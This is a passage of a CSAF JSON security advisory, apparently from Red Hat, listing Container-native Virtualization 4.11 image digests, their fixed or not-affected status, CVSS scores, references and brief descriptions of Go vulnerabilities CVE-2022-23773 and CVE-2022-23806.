"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString"
},
{
"cve": "CVE-2022-23773",
"cwe": {
"id": "CWE-1220",
"name": "Insufficient Granularity of Access Control"
},
"discovery_date": "2022-02-11T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64",
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64",
"8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64",
"8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64",
"8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2053541"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the go package of the cmd library in golang. The go command could be tricked into accepting a branch, which resembles a version tag. This issue could allow a remote unauthenticated attacker to bypass security restrictions and introduce invalid or incorrect tags, reducing the integrity of the environment.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: cmd/go: misinterpretation of branch names can lead to incorrect access control",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64"
],
"known_not_affected": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64",
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64",
"8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64",
"8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64",
"8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-23773"
},
{
"category": "external",
"summary": "RHBZ#2053541",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2053541"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-23773",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23773"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-23773",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23773"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ",
"url": "https://groups.google.com/g/golang-announce/c/SUsQn0aSgPQ"
}
],
"release_date": "2022-02-11T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2022-09-14T19:28:51+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2022:6526"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: cmd/go: misinterpretation of branch names can lead to incorrect access control"
},
{
"cve": "CVE-2022-23806",
"cwe": {
"id": "CWE-252",
"name": "Unchecked Return Value"
},
"discovery_date": "2022-02-11T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64",
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64",
"8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64",
"8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64",
"8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64",
"8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64",
"8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64",
"8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64",
"8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2053429"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the elliptic package of the crypto library in golang when the IsOnCurve function could return true for invalid field elements. This flaw allows an attacker to take advantage of this undefined behavior, affecting the availability and integrity of the resource.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: crypto/elliptic: IsOnCurve returns true for invalid field elements",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Enterprise Linux 8 and 9 are affected because the code-base is affected by this vulnerability.\n\nRed Hat Product Security has rated this issue as having a Moderate security impact. The issue is not currently planned to be addressed in future updates for Red Hat Enterprise Linux 7; hence, marked as Out-of-Support-Scope. \n\nRed Hat Developer Tools - Compilers (go-toolset-1.16 \u0026 1.17), will not be addressed in future updates as shipped only in RHEL-7, hence, marked as Out-of-Support-Scope.\n\nFor additional information, refer to the Issue Severity Classification: https://access.redhat.com/security/updates/classification/ and Red Hat Enterprise Linux Life Cycle \u0026 Updates Policy: https://access.redhat.com/support/policy/updates/errata/.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64",
"8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64"
],
"known_not_affected": [
"8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64",
"8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64",
"8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64",
"8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64",
"8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64",
"8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64",
